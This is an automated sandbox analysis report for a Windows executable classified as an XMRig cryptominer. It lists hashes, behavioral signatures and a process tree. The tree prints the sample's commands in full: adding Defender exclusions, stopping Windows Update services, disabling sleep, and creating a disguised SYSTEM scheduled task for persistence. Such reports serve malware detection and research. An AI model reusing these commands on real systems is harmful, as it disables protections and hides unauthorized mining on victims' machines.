Analysis
-
max time kernel
151s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
09-10-2023 12:37
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230831-en
General
-
Target
file.exe
-
Size
9.8MB
-
MD5
caa5d4bc40598d0896c79a5ffc90e301
-
SHA1
7af47a5ca2cc7f422b6bf33620b385fe6899af29
-
SHA256
b45152b6f575816c3d86ce8bb35fff917e6535de4ae84c04a4b97970ed0e8109
-
SHA512
95cc5f4bcbd1cb5badc24681e9a4a478e7b484ffe8ad441be86e2fd80a2410cf67e39d5c548227d18babf6c7c0fb58b5e680ea662c039b6f6c09ae11324676a1
-
SSDEEP
196608:plXsEIej17HAGQkOYj6Tr71XILoqW0wRbGypipMtCTC+K:plXsnGQfYCIluRpipMtCTCl
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 2500 created 1184 2500 file.exe 8 PID 2500 created 1184 2500 file.exe 8 PID 2500 created 1184 2500 file.exe 8 PID 2500 created 1184 2500 file.exe 8 PID 2500 created 1184 2500 file.exe 8 PID 788 created 1184 788 updater.exe 8 PID 788 created 1184 788 updater.exe 8 PID 788 created 1184 788 updater.exe 8 PID 788 created 1184 788 updater.exe 8 PID 788 created 1184 788 updater.exe 8 PID 788 created 1184 788 updater.exe 8 -
XMRig Miner payload 13 IoCs
resource yara_rule behavioral1/memory/788-49-0x000000013F870000-0x000000014023F000-memory.dmp xmrig behavioral1/memory/1240-53-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1240-56-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1240-58-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1240-60-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1240-62-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1240-64-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1240-66-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1240-68-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1240-70-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1240-74-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1240-78-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1240-80-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
pid Process 788 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 568 taskeng.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 788 set thread context of 836 788 updater.exe 68 PID 788 set thread context of 1240 788 updater.exe 69 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe file.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1616 sc.exe 1788 sc.exe 1716 sc.exe 3020 sc.exe 2436 sc.exe 2604 sc.exe 1872 sc.exe 2520 sc.exe 2700 sc.exe 1612 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1572 schtasks.exe 1372 schtasks.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 40c71163adfad901 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2500 file.exe 2500 file.exe 3008 powershell.exe 2500 file.exe 2500 file.exe 2500 file.exe 2500 file.exe 2500 file.exe 2500 file.exe 2540 powershell.exe 2500 file.exe 2500 file.exe 788 updater.exe 788 updater.exe 2648 powershell.exe 788 updater.exe 788 updater.exe 788 updater.exe 788 updater.exe 788 updater.exe 788 updater.exe 1664 powershell.exe 788 updater.exe 788 updater.exe 788 updater.exe 788 updater.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe 1240 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 3008 powershell.exe Token: SeShutdownPrivilege 2404 powercfg.exe Token: SeShutdownPrivilege 2916 powercfg.exe Token: SeDebugPrivilege 2540 powershell.exe Token: SeShutdownPrivilege 2064 powercfg.exe Token: SeShutdownPrivilege 2388 powercfg.exe Token: SeDebugPrivilege 2648 powershell.exe Token: SeShutdownPrivilege 2360 powercfg.exe Token: SeShutdownPrivilege 1672 powercfg.exe Token: SeDebugPrivilege 1664 powershell.exe Token: SeShutdownPrivilege 944 powercfg.exe Token: SeShutdownPrivilege 1416 powercfg.exe Token: SeDebugPrivilege 788 updater.exe Token: SeLockMemoryPrivilege 1240 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2720 wrote to memory of 3020 2720 cmd.exe 32 PID 2720 wrote to memory of 3020 2720 cmd.exe 32 PID 2720 wrote to memory of 3020 2720 cmd.exe 32 PID 2720 wrote to memory of 2520 2720 cmd.exe 33 PID 2720 wrote to memory of 2520 2720 cmd.exe 33 PID 2720 wrote to memory of 2520 2720 cmd.exe 33 PID 2720 wrote to memory of 2700 2720 cmd.exe 34 PID 2720 wrote to memory of 2700 2720 cmd.exe 34 PID 2720 wrote to memory of 2700 2720 cmd.exe 34 PID 2720 wrote to memory of 2436 2720 cmd.exe 35 PID 2720 wrote to memory of 2436 2720 cmd.exe 35 PID 2720 wrote to memory of 2436 2720 cmd.exe 35 PID 2720 wrote to memory of 2604 2720 cmd.exe 38 PID 2720 wrote to memory of 2604 2720 cmd.exe 38 PID 2720 wrote to memory of 2604 2720 cmd.exe 38 PID 2940 wrote to memory of 2404 2940 cmd.exe 41 PID 2940 wrote to memory of 2404 2940 cmd.exe 41 PID 2940 wrote to memory of 2404 2940 cmd.exe 41 PID 2940 wrote to memory of 2916 2940 cmd.exe 42 PID 2940 wrote to memory of 2916 2940 cmd.exe 42 PID 2940 wrote to memory of 2916 2940 cmd.exe 42 PID 2940 wrote to memory of 2064 2940 cmd.exe 43 PID 2940 wrote to memory of 2064 2940 cmd.exe 43 PID 2940 wrote to memory of 2064 2940 cmd.exe 43 PID 2940 wrote to memory of 2388 2940 cmd.exe 44 PID 2940 wrote to memory of 2388 2940 cmd.exe 44 PID 2940 wrote to memory of 2388 2940 cmd.exe 44 PID 2540 wrote to memory of 1572 2540 powershell.exe 45 PID 2540 wrote to memory of 1572 2540 powershell.exe 45 PID 2540 wrote to memory of 1572 2540 powershell.exe 45 PID 568 wrote to memory of 788 568 taskeng.exe 49 PID 568 wrote to memory of 788 568 taskeng.exe 49 PID 568 wrote to memory of 788 568 taskeng.exe 49 PID 1648 wrote to memory of 1612 1648 cmd.exe 56 PID 1648 wrote to memory of 1612 1648 cmd.exe 56 PID 1648 wrote to memory of 1612 1648 cmd.exe 56 PID 1648 wrote to memory of 1616 1648 cmd.exe 54 PID 1648 wrote to memory of 1616 1648 cmd.exe 54 PID 1648 wrote to memory of 1616 1648 cmd.exe 54 PID 1648 wrote to memory of 1788 1648 cmd.exe 55 PID 1648 wrote to memory of 1788 1648 cmd.exe 55 PID 1648 wrote to memory of 1788 1648 cmd.exe 55 PID 1648 wrote to memory of 1716 1648 cmd.exe 57 PID 1648 wrote to memory of 1716 1648 cmd.exe 57 PID 1648 wrote to memory of 1716 1648 cmd.exe 57 PID 1648 wrote to memory of 1872 1648 cmd.exe 64 PID 1648 wrote to memory of 1872 1648 cmd.exe 64 PID 1648 wrote to memory of 1872 1648 cmd.exe 64 PID 1708 wrote to memory of 2360 1708 cmd.exe 58 PID 1708 wrote to memory of 2360 1708 cmd.exe 58 PID 1708 wrote to memory of 2360 1708 cmd.exe 58 PID 1708 wrote to memory of 1672 1708 cmd.exe 63 PID 1708 wrote to memory of 1672 1708 cmd.exe 63 PID 1708 wrote to memory of 1672 1708 cmd.exe 63 PID 1708 wrote to memory of 944 1708 cmd.exe 65 PID 1708 wrote to memory of 944 1708 cmd.exe 65 PID 1708 wrote to memory of 944 1708 cmd.exe 65 PID 1708 wrote to memory of 1416 1708 cmd.exe 66 PID 1708 wrote to memory of 1416 1708 cmd.exe 66 PID 1708 wrote to memory of 1416 1708 cmd.exe 66 PID 1664 wrote to memory of 1372 1664 powershell.exe 67 PID 1664 wrote to memory of 1372 1664 powershell.exe 67 PID 1664 wrote to memory of 1372 1664 powershell.exe 67 PID 788 wrote to memory of 836 788 updater.exe 68 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1184
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3020
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2520
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2700
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2436
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2604
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2404
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2064
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lrtxivj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:1572
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1616
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1788
-
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1612
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1716
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1872
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lrtxivj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:1372
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:944
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1416
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:836
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1240
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {ED9F0E92-AE37-45B0-A4B5-39E0DBC88664} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:788
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 01⤵
- Suspicious use of AdjustPrivilegeToken
PID:2360
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.8MB
MD5caa5d4bc40598d0896c79a5ffc90e301
SHA17af47a5ca2cc7f422b6bf33620b385fe6899af29
SHA256b45152b6f575816c3d86ce8bb35fff917e6535de4ae84c04a4b97970ed0e8109
SHA51295cc5f4bcbd1cb5badc24681e9a4a478e7b484ffe8ad441be86e2fd80a2410cf67e39d5c548227d18babf6c7c0fb58b5e680ea662c039b6f6c09ae11324676a1
-
Filesize
9.8MB
MD5caa5d4bc40598d0896c79a5ffc90e301
SHA17af47a5ca2cc7f422b6bf33620b385fe6899af29
SHA256b45152b6f575816c3d86ce8bb35fff917e6535de4ae84c04a4b97970ed0e8109
SHA51295cc5f4bcbd1cb5badc24681e9a4a478e7b484ffe8ad441be86e2fd80a2410cf67e39d5c548227d18babf6c7c0fb58b5e680ea662c039b6f6c09ae11324676a1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD55a61d3d9cbda84e3d7d404a437f495c2
SHA166fa1bc05d324e6e2964cd2bd4c4d302afff98a2
SHA2563085068905d07f83d0f8ef26b817632c2686bcfb2a089fe1fca20c527cc69a34
SHA5124d37e5719decc31f126e6d1f4896fee83b71ea7f318745af69f5664216a4dff5f9ffac3f17deb1bc92da24cd2444e563c5295cdd436e073366c65ef146e0b9e8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KRSZMYWOE4D91QODLN4P.temp
Filesize7KB
MD55a61d3d9cbda84e3d7d404a437f495c2
SHA166fa1bc05d324e6e2964cd2bd4c4d302afff98a2
SHA2563085068905d07f83d0f8ef26b817632c2686bcfb2a089fe1fca20c527cc69a34
SHA5124d37e5719decc31f126e6d1f4896fee83b71ea7f318745af69f5664216a4dff5f9ffac3f17deb1bc92da24cd2444e563c5295cdd436e073366c65ef146e0b9e8
-
Filesize
9.8MB
MD5caa5d4bc40598d0896c79a5ffc90e301
SHA17af47a5ca2cc7f422b6bf33620b385fe6899af29
SHA256b45152b6f575816c3d86ce8bb35fff917e6535de4ae84c04a4b97970ed0e8109
SHA51295cc5f4bcbd1cb5badc24681e9a4a478e7b484ffe8ad441be86e2fd80a2410cf67e39d5c548227d18babf6c7c0fb58b5e680ea662c039b6f6c09ae11324676a1